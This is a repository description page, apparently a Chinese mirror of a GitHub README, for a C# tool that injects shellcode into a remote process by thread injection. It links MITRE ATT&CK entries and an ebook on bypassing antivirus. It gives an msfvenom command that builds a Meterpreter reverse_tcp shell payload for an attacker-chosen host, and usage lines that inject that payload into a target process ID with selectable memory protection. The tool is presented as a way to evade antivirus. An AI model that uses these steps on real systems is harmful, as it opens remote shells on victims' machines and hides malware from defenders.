项目作者: DamonMohammadbagher

项目描述 :
Remote Thread Injection by C# Delegate
高级语言: C#
项目地址: git://github.com/DamonMohammadbagher/NativePayload_TId.git
创建时间: 2021-02-21T15:04:11Z
项目社区:https://github.com/DamonMohammadbagher/NativePayload_TId

开源协议:

下载


NativePayload_TId

Remote Thread Injection by C# Delegate


Related Links for “Mitre ATT&CK”:

Process Injection: Portable Executable Injection ==> https://attack.mitre.org/techniques/T1055/002/

Process Injection: Dynamic-link Library Injection ==> https://attack.mitre.org/techniques/T1055/001/


Your Payload Should be Msfvenom Payload …

msfvenom –platform windows –arch x86_64 -p windows/x64/meterpreter/reverse_tcp lhost=w.x.y.z -f c > payload.txt

  1. Code1: NativePayload_TId.exe [TPID] [PAYLOAD]
  2. Code2: NativePayload_TIdnt.exe [TPID] [PAYLOAD]
  3. EXAMPLE: NativePayload_TId.exe 2452 "FC,48,83,00,..."
  4. EXAMPLE: NativePayload_TIdnt.exe 2452 "FC,48,83,00,..."

Article [1]: https://damonmohammadbagher.github.io/Posts/11Feb2021x.html

Article [2]: https://www.linkedin.com/pulse/bypassing-anti-virus-creating-remote-thread-target-mohammadbagher

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part2)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part2.pdf


online eBook, (chapters): https://damonmohammadbagher.github.io/Posts/ebookBypassingAVsByCsharpProgramming/



  1. Code1 step1: NativePayload_TId2.exe [TPID] [PAYLOAD]
  2. Code2 step2: NativePayload_TId3.exe [TPID] [VAx-addr or VirtualAllocEx Address from step1]
  3. EXAMPLE: NativePayload_TId2.exe 2452 "FC,48,83,00,..."
  4. EXAMPLE: NativePayload_TId3.exe 2452 1bfc0190000

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf


  1. NativePayload_TImd.exe [steps 1 or 2] [delay 2000] [MemoryProtection/mode 0 or 1] [TPID 4716] [payload fc,48,..]
  2. example: NativePayload_TImd.exe 1 2000 0 4716 fc,48,56,...
  3. example: NativePayload_TImd.exe 2 6721 1 4716 fc,48,56,...
  4. step = 1 you will have 4 steps (default)
  5. step = 2 you will have 28 steps
  6. MemoryProtection = 0 API::VirtualAllocEx set to MemoryProtection.ExecuteReadWrite
  7. MemoryProtection = 1 API::VirtualAllocEx set to MemoryProtection.Execute

step by step => Chapter 14 : C# Delegate & Remote Thread Injection Technique (Part3)

https://github.com/DamonMohammadbagher/eBook-BypassingAVsByCSharp/blob/master/CH14/Bypassing%20Anti%20Viruses%20by%20C%23.NET%20Programming%20Chapter%2014%20-Part3.pdf